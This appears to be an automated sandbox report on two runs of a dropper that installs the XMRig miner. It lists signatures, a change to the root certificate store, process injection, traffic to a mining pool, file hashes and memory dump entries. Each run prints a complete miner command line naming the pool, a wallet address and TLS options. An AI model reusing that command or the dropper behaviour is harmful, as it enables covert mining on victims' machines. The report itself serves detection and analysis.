memory/2816-64-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-65-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-66-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-67-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-68-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-69-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-70-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-71-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-72-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-73-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-74-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-75-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-76-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-77-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-78-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-79-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-80-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-81-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-82-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-83-0x00007FF717A40000-0x00007FF718543000-memory.dmp
memory/2816-84-0x00007FF717A40000-0x00007FF718543000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1500 wrote to memory of 756 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1500 wrote to memory of 756 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/756-16-0x0000029F4CC30000-0x0000029F4CC50000-memory.dmp
memory/756-17-0x0000029F4E640000-0x0000029F4E660000-memory.dmp
memory/756-18-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-19-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-21-0x0000029F4E680000-0x0000029F4E6A0000-memory.dmp
memory/756-20-0x0000029F4E660000-0x0000029F4E680000-memory.dmp
memory/756-22-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-25-0x0000029F4E680000-0x0000029F4E6A0000-memory.dmp
memory/756-24-0x0000029F4E660000-0x0000029F4E680000-memory.dmp
memory/756-23-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-26-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-27-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-28-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-29-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-30-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-31-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-32-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-33-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-34-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-35-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-36-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-37-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-38-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-39-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-40-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-41-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-42-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-43-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-44-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-45-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-46-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-47-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-48-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-49-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-50-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-51-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-52-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-53-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-54-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-55-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-56-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-57-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-58-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-59-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-60-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-61-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-62-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-63-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-64-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-65-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-66-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-67-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-68-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-69-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-70-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-71-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-72-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-73-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-74-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-75-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-76-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-77-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-78-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-79-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-80-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-81-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-82-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-83-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
memory/756-84-0x00007FF77BE40000-0x00007FF77C943000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3176 wrote to memory of 1236 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3176 wrote to memory of 1236 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.192.11.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1236-16-0x000001A8AB3F0000-0x000001A8AB410000-memory.dmp
memory/1236-17-0x000001A8AB430000-0x000001A8AB450000-memory.dmp
memory/1236-18-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-20-0x000001A8AB450000-0x000001A8AB470000-memory.dmp
memory/1236-21-0x000001A8AB470000-0x000001A8AB490000-memory.dmp
memory/1236-19-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-22-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-23-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-25-0x000001A8AB470000-0x000001A8AB490000-memory.dmp
memory/1236-24-0x000001A8AB450000-0x000001A8AB470000-memory.dmp
memory/1236-26-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-27-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-28-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-29-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-30-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-31-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-32-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-33-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-34-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-35-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-36-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-37-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-38-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-39-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-40-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-41-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-42-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-43-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-44-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-45-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-46-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-47-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-48-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-49-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-50-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-51-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-52-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-53-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-54-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-55-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-56-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-57-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-58-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-59-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-60-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-61-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-62-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-63-0x00007FF795280000-0x00007FF795D83000-memory.dmp
